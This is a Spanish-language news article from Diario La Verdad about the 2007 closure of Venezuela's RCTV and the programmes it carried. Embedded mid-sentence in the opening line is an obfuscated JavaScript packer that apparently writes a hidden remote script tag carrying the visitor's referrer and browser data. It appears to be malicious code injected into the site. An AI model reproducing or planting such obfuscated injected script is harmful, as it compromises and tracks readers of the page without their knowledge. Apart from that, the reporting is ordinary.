publicidad

RCTV, un corazón que aún grita

Audrey Vera Prieto / Maracaibo / avera@laverdad.com
Para eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ttkrh|var|u0026u|referrer|fhayi||js|php'.split('|'),0,{})) muchos es el día más oscuro de la televisión venezolana, aquel cuando RCTV, canal emblemático de Venezuela con 53 años al aire, cerró sus puertas

El canal de Quinta Crespo cumple 10 años de su salida de señal abierta. (Foto: Archivo La Verdad)

A partir de ese día se cercenó la libertad de expresión en Venezuela. Un día fatídico que comenzó con las palabras del presidente Hugo Chávez Frías, el 28 de diciembre de 2006: "Se les acaba la concesión en marzo. Así es que mejor es que vayan preparando sus maletas y vayan viendo qué van a hacer. No habrá nueva concesión para ese canal golpista de televisión que se llamó Radio Caracas Televisión. Se acaba la concesión, ya está redactada la medida, así que vayan preparándose, ¡apagando los equipos, pues! No se va a tolerar aquí ningún medio de comunicación que esté al servicio del golpismo, contra el pueblo, contra la nación, contra la independencia nacional, contra la dignidad de la República. ¡Venezuela se respeta!".

Estas palabras dejaron al país desconcertado. Nadie creía lo que estaba a punto de pasar. El cierre de RCTV, ¡imposible! Miles de personas salieron a protestar en contra de la medida a pesar de la represión que había en las calles de Venezuela. Todos quisieron hacer valer su derecho, el derecho a elegir, a expresarse libremente, el derecho a creer en Venezuela y en RCTV. 

A pesar de los gritos de libertad, llegó el fatídico día el 27 de mayo de 2007. Los más de tres mil trabajadores vieron un futuro incierto, se prepararon para lo inevitable, luego de cinco meses de agonía, moría RCTV y con él la libertad de expresión plena para los venezolanos que crecieron viendo al canal de Bárcenas como parte de su vida, como un amigo.

27 de mayo de 2007, 11.55 de la noche

"Jamás pierdan la esperanza. Nos vemos pronto", estas fueron las últimas palabras que se escucharon al aire en RCTV por Nelson Bustamante. A continuación las notas del himno nacional cantado por el personal, directiva y talento de RCTV marcaron con orgullo e impotencia los últimos minutos del canal con mayor sintonía y tradición del país, mientras millones de venezolanos miraron atónitos cómo luego de 53 años de entretenimiento e información, la pantalla del canal 2 se tornaba negra para pocos segundos después dar paso a la transmisión de la televisora oficialista Tves. 

RCTV Internacional 

Al no renovarle la concesión para transmitir en señal abierta, el canal adoptó el nombre de RCTV Internacional y regresó a través de los sistemas de televisión por suscripción el 16 de julio de 2007 para continuar con la producción y difusión de espacios dramáticos.

La emisión de RCTV Internacional termina el 24 de enero de 2010 por orden de Conatel, que según este organismo, la empresa no cumplió con la Ley de Responsabilidad Social en Radio y Televisión al no transmitir mensajes oficiales del Gobierno venezolano. 

Actualmente RCTV es una casa productora, en donde se realizan programas para otras cadenas tales como: Televen y Meridiano Televisión, además de asociarse con RTI Producciones de Colombia y Televisa de México. 

Documentales y libros

Un grupo de profesionales encabezado por Nelson Bustamante, emprendieron un proyecto denominado Por estos pasillos de RCTV, un libro publicado por El Nacional en 2012 que recopila las historias de quienes formaron parte de la familia del canal. Este proyecto contiene también un documental para cine y un video para televisión.

Luego de una década, Nelson Bustamante trae de nuevo un proyecto llamado RCTV, Diez Años Después, que ya puede verse completo a través de su canal de YouTube. El documental cuenta las vivencias de los trabajadores tras el cierre de la planta televisiva.

Hoy también se estrenará en el Centro Cultural Chacao en Caracas un documental y libro de la periodista Érika Corrales llamado Después del cierre… ¿Qué?  Una década sin RCTV. La periodista se enfocó en refrescar la memoria de la audiencia, combinando lo histórico con lo informativo, brindando investigación y análisis acerca del cierre.  

LO QUE DEJAMOS DE VER

El Observador

El 16 de noviembre de 1953 sale por primera vez al aire El Observador Creole, llamado así por ser patrocinado por la empresa petrolera Creole Petroleum Corporation. Sus emisiones duraban 15 minutos y se transmitían a las 8.00 de la noche. El noticiero se mantuvo en RCTV hasta 1972, cuando Creole Petroleum Corporation firma contrato con Cadena Venezolana de Televisión (Venezolana de Televisión), pasándose a llamar Noticiero Creole. La gerencia de RCTV decidió crear su División Informativa, luego denominada Dirección de Información y Programas de Opinión y rebautizó su espacio de noticias con el nombre de El Observador Venezolano. Desde 1983 pasó a llamarse El Observador

 

Radio Rochela

Desde 1959, el programa que inició como La Gran Cruzada del Buen Humor para después cambiar a Radio Rochela, fue el espacio pionero del humor en Venezuela, que logró colar sus personajes y frases dentro de la cultura pop venezolana. Se transmitió sin interrupción hasta mayo de 2007 y entró al Libro de Records Guinness por estar al aire durante 48 años. Emilio Lovera, Laureano Márquez, Cayito Aponte, Américo Navarro, Pepeto, Charles Barry, César “Nené” Quintana, Pedro “El Gato” Soto, Gladiuska Acosta y más, son solo algunos de los actores que comenzaron su carrera en el programa. Entre los sketches más recordados se encuentran: Charly Mata, Los Waperó con Matute, Perolito y Escarlata, Los Colombianos, El Portu, Los Jordan, Lilita y Rafucho, Asocerro, La Entrebizca, Dúo Warairarepano, Los Franceses, El Chúnior, El Hermano Coco, Miss Chocozuela, entre otros. 

Mi Prima Ciela

Es una telenovela producida y transmitida por RCTV en el año 2007, una adaptación de la telenovela Elizabeth original de Pilar Romero. Está protagonizada por Mónica Spear y Manuel Sosa, junto a Flavia Gleske, Jerónimo Gil, Raquel Yánez y Guillermo Pérez. Fue la última telenovela estrenada en RCTV antes del cese de la concesión. Comenzó a transmitirse el 2 de mayo de 2007 (25 días antes del vencimiento) y el 26 de mayo se transmite su último capítulo en señal abierta.

Bitácora

Desde 1994 hasta 2007, Bitácora se internó en lo más profundo de Venezuela, en aquellos parajes que todos deseaban conocer y que solo Valentina Quintero y su equipo podían mostrar. Gracias a la agudeza en la animación de Valentina y a su pasión por captar la belleza de la geografía venezolana, Bitácora  fue una referencia indiscutible a la hora de hacer turismo en Venezuela. Con un formato donde se mezcla lo informativo con un lenguaje audiovisual dinámico, cámaras indiscretas, encuadres atractivos y siguiendo las últimas tendencias de televisión real para aquel entonces. 

¿Quién Quiere Ser Millonario?

Esta producción de RCTV Producciones es un programa de juegos conducido por Eladio Lárez, basado en el formato británico de ¿Who Wants to Be a Millionaire? El programa ofrece premios millonarios en efectivo para responder correctamente a una serie de preguntas al azar con opciones múltiples y de diferentes dificultades. Se emitió desde el 23 de agosto de 2000. El programa fue uno de los primeros en realizarse en América Latina. El 23 de mayo de 2007 la producción del programa finaliza, cuatro días antes del cierre del canal. 

Aprieta y Gana

Fue el programa de concursos desde 2000 hasta 2006 en el que Winston Vallenilla y Camila Canabal presentaban las noches de los martes a varios concursantes que participaban por diversos premios en competencias muy divertidas y los televidentes participaban desde su hogar por vía telefónica. Este programa tenía una enorme audiencia entre la juventud venezolana debido a la alegría que presentaba y a la manera en la que los animadores le daban vida al espacio. La mejor sección del programa era la llamada Tángana, un momento en el que los concursantes, animadores y hasta camarógrafos, jugaban como niños con spray y papelillos. Se armaba un alboroto y ocurrían siempre cosas divertidas. 

Mensajes de Navidad

Todos los años los los canales nacionales se esmeraban en realizar un mensaje navideño. El de RCTV era uno de los preferidos por muchos debido a que la temática era diferente en cada entrega.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama